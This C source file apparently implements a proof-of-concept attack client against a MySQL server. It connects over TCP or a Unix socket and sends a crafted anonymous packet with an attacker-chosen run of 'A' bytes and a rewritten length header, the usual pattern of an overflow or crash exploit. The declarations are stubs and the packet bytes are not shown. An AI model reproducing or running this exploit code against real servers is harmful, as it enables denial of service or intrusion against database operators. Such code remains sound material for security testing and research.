
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* USOCK ;
 int* anon_pckt ;
 int anon_pckt_len ;
 int atoi (char*) ;
 int bzero (char*,int) ;
 int exit (int) ;
 char getopt (int,char**,char*) ;
 scalar_t__ isalpha (char) ;
 char* optarg ;
 scalar_t__ opterr ;
 int perror (char*) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int,int ) ;
 int sleep (int) ;
 char* strdup (char*) ;
 int tcp_conn (char*,int) ;
 int unix_conn (char*) ;

int
main (int argc, char *argv[])
{
  int fd;
  int i, ret;
  char packet[65535];
  char *path;
  char *host;
  int port = 3306;
  char buf[65535];
  int db_len = 0;
  int pckt_len = anon_pckt_len;
  int unix_sock = 1;
  char c;

  path = strdup (USOCK);
  host = strdup ("127.0.0.1");

  opterr = 0;

  while ((c = getopt (argc, argv, "s:h:p:n:")) != -1)
    switch (c)
      {
      case 's':
 path = strdup (optarg);
 unix_sock = 1;
 break;
      case 'h':
 host = strdup (optarg);
 unix_sock = 0;
 break;
      case 'p':
 port = atoi (optarg);
 unix_sock = 0;
 break;
      case 'n':
 db_len = atoi (optarg);
 break;

      default:
 break;
      }


  bzero (packet, 65535);

  pckt_len = anon_pckt_len + db_len;
  printf ("%d\n", pckt_len);

  for (i = 0; i < pckt_len; i++)
    packet[i] = anon_pckt[i];

  if (db_len)
    for (i = anon_pckt_len - 2; i < pckt_len; i++)
      packet[i] = 'A';

  packet[pckt_len - 1] = '\0';

  packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;
  packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;
  for (i = 0; i < pckt_len; i++)
    printf (" %.2x%c", (unsigned char) packet[i],
     ((i + 1) % 16 ? ' ' : '\n'));
  printf ("\n");


  if (unix_sock)
    fd = unix_conn (path);
  else
    fd = tcp_conn (host, port);

  sleep (1);
  ret = recv (fd, buf, 65535, 0);
  if (send (fd, packet, pckt_len, 0) != pckt_len)
    {
      perror ("cli: send(anon_pckt)");
      exit (1);
    }

  ret = recv (fd, buf, 65535, 0);
  for (i = 0; i < ret; i++)
    printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
  printf ("\n");
  return 0;
}
